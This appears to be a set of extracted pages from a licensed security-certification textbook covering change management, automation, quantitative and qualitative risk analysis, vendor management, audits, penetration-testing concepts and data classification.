LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Policies, Standards, and Procedures
3
1. This policy outlines the acceptable ways in which network and computer
systems may be used.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 14B
Change Management
4
• System updates
• Software patching
• Network modifications
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
If not properly managed, these changes can introduce new vulnerabilities into the
system, disrupt services, or negatively impact the organization’s compliance status.
A robust change management program allows all changes to be tracked, assessed,
approved, and reviewed. Each change must include documentation, including
details describing what will be changed, the reasons for the change, any potential
impacts, and a rollback plan in case the change does not work as planned. Each
change must be subject to risk assessment to identify potential security impacts.
Appropriate personnel must approve changes before implementation to ensure
accountability and ensure changes align with business priorities.
After implementations, changes must be reviewed and audited to ensure they have
been completed correctly and achieved their stated outcome without compromising
security. Systematic management of changes supports an organization’s ability to
reduce unexpected downtime and system vulnerabilities. Change management
programs contribute to operational resilience by ensuring that changes support
business objectives without compromising security or compliance.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
implement or approve changes. In this regard, deny lists help prevent unauthorized
or risky changes from being implemented. They can serve as a security measure to
clearly identify off-limits change types so that there is no room for negotiation or
misinterpretation.
Allow and block lists also refer to technical controls that exist in a few different
contexts, including access controls, firewall rules, and software restriction
mechanisms. Allow and block lists can impact change implementation by causing
unintended problems. For example, software allow lists can be negatively impacted
by software patching. If allow lists are based on executable file hash values, they
will fail to recognize newly patched executables after patching because their hash
values will change. This can result in fully patched systems that are unusable by
employees because none of the previously allowed software can run. Regarding
change management, it is important to incorporate the potential impacts of allow
and block lists into the testing plan.
Software Restriction Policies (block list) can be based on file hash values.
(Screenshot used with permission from Microsoft.)
Restricted activities refer to actions or changes that require additional scrutiny, strict
controls, or higher levels of approval/authorization due to their potential impact on
critical systems, sensitive data, or regulatory compliance.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Item Description
Change Requests Change requests themselves should
be reviewed and updated to reflect the
details and status of the change, including
any modifications or approvals during the
change management process.
Policies and Procedures Changes may impact existing policies and
procedures. As a result, these documents
need to be reviewed and updated to
ensure they align with the new processes,
guidelines, or controls introduced through
the change.
System or Process Documentation Documentation should reflect any changes
to systems, applications, or processes. It
may involve updating system architecture,
diagrams, process flows, standard
operating procedures (SOPs), or user
manuals to represent the current state
and functionality of the changed system.
Configuration Management Changes to configuration items, such as
Documentation servers, networks, or databases, should
be tracked and documented within
the configuration management system
to maintain an accurate record of its
configuration.
Training Materials Changes often impact employees, and
they may require more training. Existing
training materials, such as presentations,
manuals, or computer-based learning
modules, must be reviewed and updated
as warranted.
Incident Response and Changes made to systems or applications
Recovery Plans may necessitate updates to incident
response and recovery plans to
ensure they account for the revised
configurations, new dependencies, or
recovery procedures resulting from the
change.
Policies and procedures must change as often as technology does, which is often!
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Change Management
5
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 14C
Automation and Orchestration
4
Automation and orchestration are powerful tools for managing security operations.
Automation uses software to perform repetitive, rule-based tasks, such as
monitoring for threats, applying patches, maintaining baselines, or responding
to incidents, to improve efficiency and reduce the likelihood of human error.
Orchestration enhances automation by coordinating and streamlining the
interactions between automated processes and systems. Orchestration supports
seamless and integrated workflows, especially in large, complex environments
with many different security tools and systems. Automation and orchestration
also provide clear audit trails supporting regulatory compliance and incident
investigation. While their implementation comes with challenges such as
complexity, cost, and the potential for a single point of failure, careful management
of these tools can greatly improve an organization’s security posture.
Capability Description
Provisioning User and resource provisioning are
fundamental IT tasks that greatly benefit
from automation and scripting. User
provisioning describes creating, modifying,
or deleting user accounts and access rights
across IT systems. Resource provisioning
describes allocating IT resources such
as servers, storage, and networks to
applications and users. Automation can
improve these tasks, reduce manual
effort, minimize errors, and improve
turnaround time. Scripting these tasks
helps organizations provide consistent
implementation and improve compliance.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Capability Description
Guardrails and Security Groups Guardrails and security groups provide
frameworks for managing security within
an organization. Automated guardrails
can monitor and enforce compliance with
security policies, ensuring that risky activities
and behavior are prevented or flagged
for review. Security groups define which
resources a user or system can access.
Security groups can also be managed more
efficiently through automation, reducing
the possibility of unauthorized access or
excessive permissions.
Ticketing Automation can significantly improve the
efficiency of ticketing platforms. Incidents
detected by monitoring systems can
automatically generate support tickets, and
automation can also route tickets based
on predefined criteria, ensuring they reach
the right team or individual for resolution.
Automated escalation procedures can
also ensure that critical issues receive
immediate attention. Examples include
high-impact incidents, incidents requiring
specialized teams, incidents involving
executives and important customers, or any
issue that risks violating an established SLA.
Service Management Automation and scripting are also essential
tools for managing services and access
within an IT environment. Security analysts
can automate routine tasks such as enabling
or disabling services, modifying access
rights, and maintaining the lifecycle of IT
resources, freeing up time to focus on more
strategic or complicated analytical tasks.
Continuous Integration The principles of continuous integration
and Testing and testing hinge heavily on automation. In
this approach, developers regularly merge
their changes back to the main code branch,
and each merge is tested automatically
to help detect and even fix integration
problems. This capability improves code
quality, accelerates development cycles, and
reduces the risk of integration issues.
Application Programming APIs enable different software systems to
Interfaces (APIs) communicate and interact, and automation
can orchestrate these interactions, creating
seamless workflows and facilitating the
development of more complex systems,
such as security orchestration, automation
and response (SOAR) platforms.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Automation can support staff retention initiatives by reducing fatigue from repetitive
tasks. Automation practices can free staff to perform more rewarding work and increase
job satisfaction.
Important Considerations
While automation and orchestration provide numerous benefits, they also present
some significant challenges, some of which are listed below:
• Complexity—Implementing automation and orchestration requires a deep
understanding of an organization’s systems, processes, and interdependencies.
A poorly planned or executed automation strategy can add complexity, making
systems more difficult to manage and maintain.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Maintaining system security when new hardware or infrastructure items are added
to the network can be achieved by enforcing standard configurations across the
company. With automated configurations, these newly added items can be kept up to
date and secure.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Automation and Orchestration
5
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 14
Summary
4
You should be able to identify the importance of governance and its role in shaping
the capabilites of a security program.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LESSON INTRODUCTION
Effective risk management practices involve systematically identifying, assessing,
mitigating, and monitoring organizational risks. Audits provide an independent
and objective evaluation of processes, controls, and compliance, ensuring
adherence to standards and identifying gaps that pose risks. On the other hand,
assessments help evaluate the effectiveness of risk management strategies, identify
potential vulnerabilities, and prioritize mitigation efforts. By combining audits and
assessments, organizations can comprehensively understand risks, implement
appropriate controls, and continuously monitor and adapt their risk management
strategies to protect against potential threats. These practices are essential for
maintaining proactive and resilient security operations while ensuring compliance
with legal mandates.
Lesson Objectives
In this lesson, you will do the following:
• Explain risk management processes and concepts.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 15A
Risk Management Processes and
Concepts
2
Risk Assessment
Risk assessment is a core component of a cybersecurity program that evaluates
previously identified risks to determine their potential impact on the organization.
Risk assessment methodologies include ad hoc, recurring, one-time, or continuous.
Ad hoc risk assessments are conducted as needed, often in response to specific
incidents, such as news of a new, actively exploited zero-day vulnerability or
environmental changes such as system upgrades. One-time assessments are
comprehensive evaluations carried out at a particular point in time, often during
the implementation of a new system (or process) or to obtain an independent
assessment of an organization's operational maturity. Recurring risk assessments
are scheduled at regular intervals, such as annually, quarterly, or monthly, and
can include audits, compliance checks, vulnerability scans, and other types of
assessment. Continuous risk assessments constantly evaluate risks and are
supported by specialized tools that produce real-time data, such as agent-based
vulnerability scanning platforms and intrusion detection systems. Different risk
assessment methods are commonly combined to ensure effective identification
and management of risk.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Quantitative risk assessment aims to assign concrete values to each risk factor.
(Image © 123RF.com.)
Quantitative Analysis
Quantitative risk analysis aims to assign concrete values to each risk factor.
• Single Loss Expectancy (SLE)—The amount that would be lost in a single
occurrence of the risk factor. This is determined by multiplying the value of the
asset by an exposure factor (EF). EF is the percentage of the asset value that
would be lost. For example, it may be determined that a tornado weather event
will damage 40% of a building. The exposure factor in this case is 40% because
only part of the assest is lost. If the building is worth $200,000, this event SLE is
200,000*0.4 or $80,000.
• Annualized Loss Expectancy (ALE)—The amount that would be lost over the
course of a year. This is determined by multiplying the SLE by the annualized
rate of occurrence (ARO). ARO describes the number of times in a year that an
event occurs. In our previous (highly simplified) example, if it is anticipated that
a tornado weather event will cause an impact twice per year, then the ARO is
considered to be simply “2.” The ARO is the cost of the event (SLE) multiplied by
the number of times in a year it occurs. In the tornado example, SLE is $80,000
and ARO is 2 so the ALE is $160,000. This number is useful when considering
different ways to protect the building from tornados. If it is known that tornados
will have a $160,000 per year average cost, then this number can be used as a
comparison when considering the cost of various protections.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
It is important to realize that the value of an asset does not refer solely to its
material value. The two principal additional considerations are direct costs
associated with the asset being compromised (downtime) and consequent costs
to intangible assets, such as the company’s reputation. For example, a server
may have a material cost of a few hundred dollars. If the server were stolen, the
costs incurred from not being able to do business until it can be recovered or
replaced could run to thousands of dollars. In addition, the period of interruption
during which orders cannot be taken or go unfulfilled may lead customers to seek
alternative suppliers, potentially resulting in the loss of thousands of sales and
goodwill.
The value of quantitative analysis is its ability to develop tangible numbers that
reflect real money. Quantitative analysis helps to justify the costs of various
controls. When analysts can associate cost savings with a control, it is easy to justify
its expense. For example, it is easy to justify the money spent on a load balancer
to eliminate losses from website downtime that exceeded the cost of the load
balancer. Unfortunately, such direct and clear associations are uncommon!
The problem with quantitative risk assessment is that the process of determining
and assigning these values is complex and time consuming. The accuracy of the
values assigned is also difficult to determine without historical data (often, it has to
be based on subjective guesswork). However, over time and with experience, this
approach can yield a detailed and sophisticated description of assets and risks and
provide a sound basis for justifying and prioritizing security expenditure.
Qualitative Analysis
Qualitative risk analysis is a method used in risk management to assess risks
based on subjective judgment and qualitative factors rather than precise numerical
data. Qualitative risk analysis aims to provide a qualitative understanding of risks,
their potential impact, and the likelihood of their occurrence. Often referred to as
risk analysis using words, not numbers, this approach helps identify and prioritize
intangible risks.
One of the benefits of qualitative risk analysis is its simplicity and ease of use. It
does not require complex mathematical calculations or extensive data collection,
making it a more accessible approach. It allows for a quick initial assessment of
risks, enabling organizations to identify and focus on the most significant issues.
Qualitative risk analysis frames risks by considering their causes, consequences,
and potential interdependencies to improve risk communication and
decision-making.
Qualitative risk analysis has some limitations. It is subjective in nature and heavily
relies on expert judgment, which often introduces biases and inconsistencies if
expert opinions differ. The lack of numerical data in qualitative risk analysis may
make communicating risks to stakeholders who prefer quantitative information
challenging. Despite these limitations, qualitative risk analysis is important because
it provides a simplified description of risks and can help quickly draw attention to
significant issues.
Inherent Risk
The result of a quantitative or qualitative analysis is a measure of inherent risk.
Inherent risk is the level of risk before any type of mitigation has been attempted.
In theory, security controls or countermeasures could be introduced to address
every risk factor. The difficulty is that security controls can be expensive, so it is
important to balance the cost of the control with the cost associated with the risk.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
It is not possible to eliminate risk; rather the aim is to mitigate risk factors to the
point where the organization is exposed only to a level of risk that it can tolerate.
The overall status of risk management is referred to as risk posture. Risk posture
shows which risk response options can be identified and prioritized. For example,
an organization might identify the following priorities:
• Regulatory requirements to deploy security controls and make demonstrable
efforts to reduce risk. Examples of legislation and regulation that mandate risk
controls include SOX, HIPAA, Gramm-Leach-Bliley, the Homeland Security Act,
PCI DSS regulations, and various personal data protection measures.
Heat Map
Another simple approach is the heat map or “traffic light” impact matrix. For
each risk, a simple red, yellow, or green indicator can be put into each column to
represent the severity of the risk, its likelihood, cost of controls, and so on. This
approach is simplistic but does give an immediate impression of where efforts
should be concentrated to improve security.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Risk Transference
Transference (or sharing) means assigning risk to a third party, such as an
insurance company. Specific cybersecurity insurance or cyber liability coverage
protects against fines and liabilities arising from data breaches and attacks.
Note that in this sort of case it is relatively simple to transfer the obvious risks, but
risks to the company’s reputation remain. If a customer’s credit card details are stolen
because they used your unsecure e-commerce application, the customer won't care if
you or a third party were nominally responsible for security. It is also unlikely that legal
liabilities could be completely transferred in this way. For example, insurance terms are
likely to require that best practice risk controls have been implemented.
Risk Acceptance
Risk acceptance (or tolerance) means that no countermeasures are put in place
because the level of risk does not justify it.
A risk exception describes a situation where a risk cannot be mitigated using
standard risk management practices or within a specified time frame due to
financial, technical, or operational conditions. A risk exception formally recognizes
the risk and seeks to identify alternate mitigating controls, if possible. Relevant
stakeholders, such as risk managers or senior executives, must approve all risk
exceptions. Risk exceptions should be temporary and reviewed on an established
time frame to determine whether the risk levels have changed or if the exception
can be removed.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
A risk exemption is a condition where risk can remain without mitigation, usually
due to a strategic business decision. Risk exemptions are generally associated with
situations where the cost of mitigating a risk outweighs its potential harm or can
lead to significant strategic benefits when accepted. Similarly to risk exceptions,
risk exemptions must be formally documented and approved by risk managers or
senior executives and periodically reviewed using an established timetable.
The four risk responses are avoid, accept, mitigate, and transfer.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
For each business process and each threat, you must assess the degree of risk that
exists. Calculating risk is complex, but the two main variables are likelihood and
impact:
• Likelihood is often used in qualitative analysis to describe the chance of a risk
event happening subjectively. Likelihood is typically expressed using “low,”
“medium,” and “high” or scored on a scale from 1 to 5.
• Impact is the severity of the risk if realized as a security incident. This may be
determined by factors such as the value of the asset or the cost of disruption if
the asset is compromised.
Risk Registers
A risk register is a document showing the results of risk assessments in a
comprehensible format and includes information regarding risks, their severity, the
associated owner of the risk, and all identified mitigation strategies. The register
may include a heat map risk matrix (shown earlier) with columns for impact and
likelihood ratings, date of identification, description, countermeasures, owner/route
for escalation, and status.
Risk registers are also commonly depicted as scatterplot graphs, where impact
and likelihood are each an axis, and the plot point is associated with a legend that
includes more information about the nature of the plotted risk. A risk register
should be shared amongstakeholders (executives, department managers, and
senior technicians) so that they understand the risks associated with the workflows
that they manage.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Risk Threshold
Risk threshold defines the limits or levels of acceptable risk an organization is
willing to tolerate. The risk threshold represents the boundaries within which
risks are considered to be acceptable and manageable. Risk thresholds are based
on various factors such as regulatory requirements, organizational objectives,
stakeholder expectations, and the organization’s risk appetite to help establish
clear guidelines for decision-making. Organizations often define different risk
thresholds for different types of risks based on their potential impact and
criticality.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Risk Reporting
Risk reporting describes the methods used to communicate an organization’s
risk profile and the effectiveness of its risk management program. Effective risk
reporting supports decision-making, highlights concerns, and ensures stakeholders
understand the organization’s risks. The content of risk reports must be relevant
to its intended audience. For example, reports designed for board members must
focus on strategic risks and the organization’s overall risk appetite. Operational risk
reports must include specific details regarding the factors contributing to risk and
are appropriate for managers or technical employees. Risk reports must also clearly
convey recommended risk responses, such as accepting, mitigating, transferring, or
avoiding the risk.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Functions that act as support for the business or an MEF, but are not critical in
themselves, are referred to as primary business functions (PBF).
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
• Recovery point objective (RPO) is the amount of data loss that a system can
sustain, measured in time. That is, if a database is destroyed by a virus, an
RPO of 24 hours means that the data can be recovered (from a backup copy)
to a point not more than 24 hours before the database was infected. RPO is
determined by identifying the maximum acceptable data loss an organization
can tolerate in the event of a disaster or system failure and is established
by considering factors such as business requirements, data criticality, and
regulatory or contractual obligations. The calculation of RPO directly impacts
the frequency of data backups, data replication requirements, recovery site
selection, and technologies that support failover and high availability.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Mean time to repair (MTTR) and mean time between failures (MTBF) are key
performance indicators (KPIs) used to measure the reliability and efficiency
of systems, processes, and equipment. Both metrics are important to risk
management processes, providing measurable insights into potential risks and
supporting risk mitigation strategies. MTTR and MTBF guide decisions regarding
system design, maintenance practices, and redundancy or failover requirements.
• Mean time between failures (MTBF) represents the expected lifetime of a
product. The calculation for MTBF is the total operational time divided by the
number of failures. For example, if you have 10 appliances that run for 50 hours
and two of them fail, the MTBF is 250 hours/failure (10*50)/2.
• Mean time to repair (MTTR) is a measure of the time taken to correct a fault so
that the system is restored to full operation. This can also be described as mean
time to replace or recover. MTTR is calculated as the total number of hours
of unplanned maintenance divided by the number of failure incidents. This
average value can be used to estimate whether a recovery time objective (RTO) is
achievable.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Risk Management Processes
and Concepts
3
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 15B
Vendor Management Concepts
4
Vendor Selection
Vendor selection practices must systematically evaluate and assess potential
vendors to minimize risks associated with outsourcing or procurement. It typically
includes several steps, such as identifying risk criteria, conducting due diligence,
and selecting vendors based on their risk profile. Risk management practices aim
to identify and mitigate risks related to financial stability, operational reliability,
data security, regulatory compliance, and reputation. The goal is to select vendors
who align with the organization’s risk tolerance and demonstrate the capability to
manage risks effectively.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Conflict of Interest
A conflict of interest arises when an individual or organization has competing
interests or obligations that could compromise their ability to act objectively,
impartially, or in the best interest of another party. When performing vendor
assessments, it is vital to determine whether a vendor’s interests, relationships, or
affiliations may influence their ability to provide unbiased recommendations, fair
pricing, or deliver services without bias. Organizations must diligently identify and
address potential conflicts of interest, including scrutinizing the vendor’s affiliations,
relationships with competitors or stakeholders, financial interests, and any potential
bias that could compromise their integrity. Some examples of conflict of interest
include the following items:
• Financial Interests—A vendor may have a financial interest in recommending
specific products or services due to partnerships, commissions, or financial
incentives that bias their recommendations and lead to selecting options that
may not fit the organization’s needs.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Performing vendor site visits offer firsthand observation and assessment of a vendor's
physical facilities, operational processes, and overall risk management practices,
allowing for a more comprehensive evaluation of potential risks and vulnerabilities.
Vendor Monitoring
Vendor monitoring involves continuously overseeing and evaluating vendors to
ensure ongoing adherence to security standards, compliance requirements, and
contractual obligations. It may include regular performance reviews, periodic
assessments, and real-time monitoring of vendor activities. This proactive
approach allows organizations to promptly identify and address potential risks or
issues.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Legal Agreements
Legal agreements play a vital role in supporting vendor relationships by establishing
both parties’ rights, responsibilities, and expectations. Legal agreements serve
as the foundation for the vendor-client relationship, providing a framework for
conducting business and addressing potential issues or disputes that may arise.
Initial Agreements
Different types of agreements are needed to govern vendor relationships based
on the specific nature of the engagement and the services being provided. The
following agreements play distinct roles in setting up vendor relationships:
• Memorandum of Understanding (MOU)—a nonbinding agreement that
outlines the intentions, shared goals, and general terms of cooperation between
parties. MOUs serve as a preliminary step to establish a common understanding
before proceeding with a more formal agreement.
Detailed Agreements
Where initial agreements establish a framework for collaboration or service
provision, other agreements can be implemented to specify terms for operational
detail. These help to govern vendor relationships effectively.
• Service-level Agreement (SLA)—defines the specific performance metrics,
quality standards, and service levels expected from the vendor.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Questionnaires
Questionnaires gather vendor information about their security practices, controls,
and risk management strategies to help organizations assess a vendor’s security
posture, identify vulnerabilities, and evaluate their capabilities. Questionnaires
provide a structured means of obtaining consistent vendor information, enabling
more effective risk analysis and comparison fairly and consistently. Questionnaires
collect information about the vendor’s security policies, procedures, and controls,
including data protection, access management, incident response, and disaster
recovery. The questionnaire may ask about a vendor’s compliance with industry-
specific regulations and standards, such as GDPR, HIPAA, ISO 27001, or PCI-DSS.
It may also seek details about the vendor’s security training and awareness
programs for employees and their approach to conducting third-party security
assessments and audits. Additionally, the questionnaire may explore the vendor’s
incident response capabilities, breach history, and insurance coverage.
Rules of Engagement
Rules of Engagement (RoE) define the parameters and expectations for vendor
relationships. These rules outline the responsibilities, communication methods,
reporting mechanisms, security requirements, and compliance obligations that
vendors must adhere to. Rules of engagement establish clear guidelines for the
vendor’s behavior, activities, and access to sensitive information. By setting these
boundaries, organizations can establish a controlled and secure environment,
mitigating the potential risks associated with third-party relationships. Some
important elements included in an RoE include the following:
• Roles and Responsibilities—Clearly define the roles and responsibilities of the
vendor and client in managing risks, including specifying who is responsible for
identifying, assessing, and mitigating various types of risks.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Vendor Management Concepts
5
management practices.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 15C
Audits and Assessments
5
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Internal Assessments.
Approach Description
Compliance Assessment Internal compliance assessments ensure operating
practices align with laws, regulations, standards,
policies, and ethical requirements. These assessments
evaluate the effectiveness of internal controls, identify
noncompliance or risk areas, and communicate
findings to stakeholders such as risk managers.
Audit Committee Audit committees provide independent oversight
and assurance regarding an organization’s financial
reporting, internal controls, and risk management
practices. These committees are typically composed
of board members independent of the organization’s
management team. Audit committees aim to
enhance the integrity of financial statements, ensure
compliance with legal and regulatory requirements,
monitor the effectiveness of internal controls, oversee
the external audit process, and promote transparency
and accountability. Audit committees are critical
in fostering confidence among shareholders,
stakeholders, and the public by providing an
independent and objective assessment of the
organization’s financial practices and contributing to
sound corporate governance.
Self-Assessment Self-assessments allow individuals or organizations to
evaluate their performance, practices, and adherence
to established criteria against predetermined metrics
and measures. Self-assessments help identify
strengths, weaknesses, and areas for improvement,
enabling individuals or organizations to take proactive
measures to enhance their effectiveness and
outcomes. Self-assessments imply internal personnel
with the expertise, knowledge, and understanding of
the assessed area are available to complete them.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Internal assessments are required for government agencies according to the NIST RMF,
PCI-DSS, and others.
External Assessments
Approach Description
Regulatory Regulatory authorities or agencies perform assessments to
ensure compliance with specific laws, regulations, or industry
standards. Regulatory assessments evaluate whether
organizations adhere to mandatory regulatory requirements
and promote a culture of compliance. Regulatory
assessments typically involve inspections, audits, or reviews
of processes, practices, and controls to verify compliance,
identify deficiencies, and enforce regulatory obligations.
Regulatory assessments play a critical role in safeguarding
public interests, protecting consumers, maintaining
market integrity, and upholding industry standards. They
help mitigate risks, ensure fair competition, and enhance
transparency and accountability in regulated industries.
Examination An external examination typically refers to an independent
and formal evaluation conducted by external parties, such
as auditors or regulators, to assess the accuracy, reliability,
and compliance of an organization’s financial statements,
processes, controls, or specific aspects of its operations.
External examinations focus on verifying information
accuracy and ensuring compliance with applicable laws,
regulations, or industry standards. Examples of external
examinations include financial statement audits, regulatory
compliance audits, and specific assessments of control
environments.
Assessment An external assessment generally refers to a broad
evaluation conducted by external experts or consultants
to assess an organization’s overall performance, practices,
capabilities, or specific focus areas. External assessments
can encompass various elements, such as strategy,
operational efficiency, risk management, cybersecurity, or
compliance practices. The goal is to provide an objective and
independent perspective on the organization’s strengths,
weaknesses, and opportunities for improvement.
Independent Independent third-party audits provide objective and
Third-Party Audit unbiased assessments of an organization’s systems,
controls, processes, and compliance. The importance of
independent third-party audits lies in their ability to offer
an external perspective, free from any conflicts of interest
or bias. Independent audits instill confidence among
stakeholders, including customers, business partners,
regulatory bodies, and investors, as they attest to an
organization’s commitment to quality, compliance, and good
governance. They also help organizations demonstrate
transparency, accountability, and adherence to industry
standards and regulations.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
External entities could include certified public accountants (CPAs), external auditors,
consulting firms, regulatory bodies, or specialized assessment agencies. The
independence of these external assessors ensures impartiality and objectivity in the
evaluation process.
Penetration Testing
A penetration test—often shortened to pen test—uses authorized hacking
techniques to discover exploitable weaknesses in the target’s security systems.
Pen testing is also referred to as ethical hacking. A pen test might involve the
following steps:
• Verify a Threat Exists—use surveillance, social engineering, network scanners,
and vulnerability assessment tools to identify a vector by which vulnerabilities
could be exploited.
• Bypass Security Controls—look for easy ways to attack the system. For
example, if the network is strongly protected by a firewall, is it possible to gain
physical access to a computer in the building and run malware from a USB stick?
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Exercise Types
Penetration testing is a crucial component of cybersecurity assessments
that involves simulating real-world attacks on computer systems, networks,
or applications to identify vulnerabilities and weaknesses. Different types of
penetration tests exist to address specific objectives related to a security evaluation,
such as testing specific systems, assessing incident response capabilities, measuring
the effectiveness of physical controls, and many other areas. Different types of
penetration tests allow organizations to use a flexible and prioritized approach
toward security assessment.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Review Activity:
Penetration Testing Concepts
6
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Lesson 15
Summary
5
You should be able to explain risk management, business impact analysis, and
disaster recovery planning processes and metrics.
• Create a risk register to help manage and track risks including the staff assigned
to address them.
• Identify and analyze the vendors included in the supply chain and ensure they
have adequate security operations.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
LESSON INTRODUCTION
Data protection and compliance encompass a range of practices and principles
aimed at safeguarding sensitive information, ensuring privacy, and adhering to
applicable laws and regulations. Data protection involves implementing measures
to secure data against unauthorized access, loss, or misuse. It includes practices
such as encryption, access controls, data backup, and secure storage. Compliance
refers to conforming to legal, regulatory, and industry requirements relevant to
data handling, privacy, security, and transparency. Organizations can safeguard
individuals’ privacy, ensure data security, fulfill legal requirements, and establish
credibility with customers, partners, and regulatory authorities by comprehending
and implementing these data protection and compliance principles. Compliance
with applicable data protection laws, regulations, and standards is crucial for
organizations to avoid legal liabilities, reputational damage, and financial penalties
associated with noncompliance.
Lesson Objectives
In this lesson, you will do the following:
• Explain privacy and data sensitivity concepts.
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Topic 16A
Data Classification and Compliance
2
Data Types
The concept of data types refers to categorizing or classifying data based on its
inherent characteristics, structure, and intended use. Data types provide a way
to organize and understand the different data forms within a system or dataset.
Classifying data into specific types makes analyzing, processing, interpreting, and
securing information easier.
Regulated Data
Regulated data refers to specific categories of information subject to legal
or regulatory requirements regarding their handling, storage, and protection.
Regulated data typically includes sensitive or personally identifiable information
(PII) protected by laws and regulations to ensure privacy, security, and appropriate
use. The types of regulated data vary depending on jurisdiction and the specific
regulations applicable to the organization or data. Common examples of regulated
data include financial information, healthcare records, social security numbers,
credit card details, and other personally identifiable information. Privacy laws and
industry-specific regulations often protect these data types, such as the Health
Insurance Portability and Accountability Act (HIPAA) for healthcare data or the
Payment Card Industry Data Security Standard (PCI DSS) for credit card information.
Organizations that handle regulated data must comply with relevant laws and
regulations governing its protection. Compliance typically involves implementing
appropriate security measures, data encryption, access controls, data breach
notification procedures, and data handling protocols. Organizations may also need
to establish data storage, retention, and destruction safeguards to meet regulatory
requirements.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Trade Secrets
Trade secret data refers to valuable, confidential information that gives a business
a competitive advantage. Trade secrets encompass much nonpublic, proprietary
information, including formulas, processes, methods, techniques, customer lists,
pricing information, marketing strategies, and other business-critical data. Trade
secrets have commercial value derived from their secrecy. Businesses often require
employees and contractors to sign non-disclosure agreements (NDAs) to safeguard
the confidentiality of trade secrets. Disclosure or unauthorized use of trade secret
data is a serious legal matter. Companies can take legal action against individuals or
organizations unlawfully acquiring, using, or disclosing trade secrets. Laws related
to trade secrets vary across jurisdictions, but they generally aim to prevent unfair
competition and provide remedies for misappropriation.
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Data Classifications
Data classification and typing schemas tag data assets so that they can be
managed through the information lifecycle. A data classification schema is a
decision tree for applying one or more tags or labels to each data asset. Many data
classification schemas are based on the degree of confidentiality required:
• Public (unclassified)—there are no restrictions on viewing the data. Public
information presents no risk to an organization if it is disclosed but does present
a risk if it is modified or not available.
• Critical (top secret)—the information is too valuable to allow any risk of its
capture. Viewing is severely restricted.
Using Microsoft Azure Information Protection to define an automatic document labeling and
watermarking policy. (Screenshot used with permission from Microsoft.)
Lesson 16: Summarize Data Protection and Compliance Concepts | Topic 16A
LICENSED FOR USE ONLY BY: JUXHERS FISHKA · 60582412 · OCT 09 2024
Data Sovereignty
Data sovereignty refers to a jurisdiction preventing or restricting processing and
